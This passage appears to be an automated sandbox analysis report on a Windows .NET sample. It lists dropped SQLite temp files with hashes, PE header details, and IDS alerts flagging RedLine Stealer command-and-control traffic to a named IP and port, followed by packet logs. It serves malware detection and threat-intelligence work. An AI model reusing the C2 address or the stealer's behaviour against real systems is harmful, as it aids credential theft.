SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBD3B.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBD3C.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBD4D.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBD5E.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBD5F.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBD6F.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBD80.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF569.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF57A.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.626248932753941
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	chTJmCR9bS.exe
File size:	582'144 bytes
MD5:	963f526636c53e9ecf5af8025e0daca0
SHA1:	bf41a267e768fca782e6861ba274aac58f79a959
SHA256:	55d48276b91ae07b4a4b26ab074d2fae49ffdee7f227fc62587a46696ecbf2b3
SHA512:	85d347f552ee0f73af7e5f198430c452b4194f73f9313007f4e800e3fc2a9cc07c6c20de7cf81ac6530ff45b35b09b8ae137f01319ed86ceb084329ebff67fa8
SSDEEP:	12288:UfLYRxA4Y5lyA/BxSPCPU0/iRsFpPQPht0XJ1vzUZdJFk7UQlbd9JU:XR6KRDPht0HgHUvbdX
TLSH:	FEC4F1553269D803C4A70BB10A32D3F95378AD9AF920C7939FE93EEF79B6B412540352
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g..............0.............B.... ........@.. .......................@............@................................

File Icon


Icon Hash:	1bb3b3b3b3d389b3

Static PE Info

General

Entrypoint:	0x48e342
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6785C04F [Tue Jan 14 01:39:27 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
and dword ptr [eax], eax
inc eax
add byte ptr [ebx], ah
add byte ptr [eax+eax], ah
and eax, 26005E00h
add byte ptr [edx], ch
add byte ptr [eax], ch
add byte ptr [ecx], ch
add byte ptr [edi], bh
add byte ptr [eax], al
add byte ptr [edx+003E9999h], bl
add byte ptr [eax], al
aas
int CCh
dec esp
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8e2f0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x90000	0x19e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x92000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8c370	0x8c400	06b1bf80b038e9681847e4eb2bcdd793	False	0.8914361909536542	data	7.633753836163965	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x90000	0x19e0	0x1a00	2cf0a0488a38d7b86d44a3a78f21126e	False	0.7976262019230769	data	7.164526840597511	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x92000	0xc	0x200	1221aa836c784e357af76c4581bc82ce	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x90118	0x151a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8863383931877082
RT_GROUP_ICON	0x91634	0x14	data	0.9
RT_GROUP_ICON	0x91648	0x14	data	1.05
RT_VERSION	0x9165c	0x384	data	0.43222222222222223

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-19T13:02:14.490257+0100	1800000	Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect	1	192.168.2.4	49741	185.222.57.84	55615	TCP
2025-01-19T13:02:14.490257+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.4	49741	185.222.57.84	55615	TCP
2025-01-19T13:02:19.516256+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	185.222.57.84	55615	192.168.2.4	49741	TCP
2025-01-19T13:02:19.724822+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.4	49741	185.222.57.84	55615	TCP
2025-01-19T13:02:22.103197+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	185.222.57.84	55615	192.168.2.4	49741	TCP
2025-01-19T13:02:22.103197+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	185.222.57.84	55615	192.168.2.4	49741	TCP
2025-01-19T13:02:22.471503+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.4	49744	185.222.57.84	55615	TCP
2025-01-19T13:02:24.045230+0100	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.4	49745	185.222.57.84	55615	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 19, 2025 13:02:13.831326962 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:13.836257935 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:13.836340904 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:13.854244947 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:13.859040022 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:14.209176064 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:14.214525938 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:14.438488007 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:14.490257025 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:19.511054993 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:19.511054993 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:19.516256094 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:19.516459942 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:19.681185007 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:19.724822044 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:19.777754068 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:19.777807951 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:19.777848959 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:19.777887106 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:19.777926922 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:19.777971983 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:19.778202057 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:19.832500935 CET	49743	443	192.168.2.4	104.26.12.31
Jan 19, 2025 13:02:19.832571030 CET	443	49743	104.26.12.31	192.168.2.4
Jan 19, 2025 13:02:19.832653999 CET	49743	443	192.168.2.4	104.26.12.31
Jan 19, 2025 13:02:19.839039087 CET	49743	443	192.168.2.4	104.26.12.31
Jan 19, 2025 13:02:19.839066982 CET	443	49743	104.26.12.31	192.168.2.4
Jan 19, 2025 13:02:20.307439089 CET	443	49743	104.26.12.31	192.168.2.4
Jan 19, 2025 13:02:20.307579041 CET	49743	443	192.168.2.4	104.26.12.31
Jan 19, 2025 13:02:20.311050892 CET	49743	443	192.168.2.4	104.26.12.31
Jan 19, 2025 13:02:20.311081886 CET	443	49743	104.26.12.31	192.168.2.4
Jan 19, 2025 13:02:20.311491013 CET	443	49743	104.26.12.31	192.168.2.4
Jan 19, 2025 13:02:20.359445095 CET	49743	443	192.168.2.4	104.26.12.31
Jan 19, 2025 13:02:20.403377056 CET	443	49743	104.26.12.31	192.168.2.4
Jan 19, 2025 13:02:20.713362932 CET	443	49743	104.26.12.31	192.168.2.4
Jan 19, 2025 13:02:20.713608027 CET	443	49743	104.26.12.31	192.168.2.4
Jan 19, 2025 13:02:20.713682890 CET	49743	443	192.168.2.4	104.26.12.31
Jan 19, 2025 13:02:20.716881037 CET	49743	443	192.168.2.4	104.26.12.31
Jan 19, 2025 13:02:22.097742081 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.098025084 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.103038073 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.103121996 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.103197098 CET	55615	49741	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.103255033 CET	49741	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.104007006 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.108831882 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.459398985 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.464595079 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.464633942 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.464692116 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.464720964 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.464747906 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.464745998 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.464806080 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.464874029 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.464884996 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.464905977 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.464936972 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.464957952 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.464992046 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.465099096 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.465260983 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.469794035 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.469928026 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.469927073 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.469959974 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.470012903 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.470019102 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.470041037 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.470069885 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.470072031 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.470103025 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.470129013 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.471384048 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.471503019 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.516335964 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.516457081 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.564454079 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.564609051 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.566549063 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.566742897 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.569580078 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.569610119 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.569638014 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.569654942 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.569695950 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.571691990 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.571815014 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.571826935 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.571856022 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.571917057 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.571933031 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.571962118 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572025061 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572029114 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572055101 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572093010 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572104931 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572119951 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572134018 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572163105 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572189093 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572211027 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572242975 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572268009 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572271109 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572299957 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572304964 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572326899 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572365999 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572377920 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572406054 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572433949 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572446108 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572460890 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572513103 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572519064 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572540045 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572563887 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572567940 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572593927 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572596073 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572619915 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572623968 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.572643995 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:22.572650909 CET	55615	49744	185.222.57.84	192.168.2.4
